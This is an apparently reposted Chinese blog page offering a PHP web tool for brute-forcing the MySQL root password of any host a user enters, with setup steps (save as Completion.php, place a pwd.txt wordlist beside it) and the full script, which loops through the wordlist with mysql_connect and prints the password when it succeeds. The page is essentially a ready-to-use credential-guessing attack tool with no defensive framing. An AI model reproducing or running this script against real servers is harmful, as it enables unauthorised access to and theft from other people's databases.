Mysql账号密码在线爆破脚本(PHP)

用法:保存为Completion.php文件,将密码字典放置同目录下为pwd.txt文件,浏览器打开就可使用。

Mysql账号密码在线爆破脚本(PHP)_第1张图片

<html>
 <head>
  <title>Mysql账号密码在线爆破工具</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 </head>
 <body>
  <center>
   <br><br>
   <h1>Mysql账号密码在线爆破工具 V2.0</h1>
  <br>
<?php
 if(@$_POST['submit']){
   $host = @$_POST['host'];
   if($host!==""){
    $username = "root";//用户名字典
	$password = array();
	$filename = "pwd.txt"; //同目录下密码字典
	$i=0;
	$file = fopen($filename,'r');
	while(! feof($file)){
		$password[$i] = fgets($file);
		$i++;
	}


	fclose($file);
    echo "

-----------------------爆破状态-----------------------
"
; for ($l=0; $l <= count($password); $l++) { $password1 = trim($password[$l]); //除去左右空白 if(@mysql_connect($host, $username, $password1)){ echo ""; echo "

爆破成功--密码-->"
.@$password1.""; break; }else{ continue; } } echo "
----------------------爆破结束-----------------------

"
; }else{ echo ""; } } ?> <br><br><br><br> <form action="Completion.php" method="post"> 数据库IP地址:<input type="text" name="host"/> <input type="submit" value="爆破" name="submit"/> </form> <center> </body> </html>

你可能感兴趣的:(数据库,Web安全,php,mysql,安全)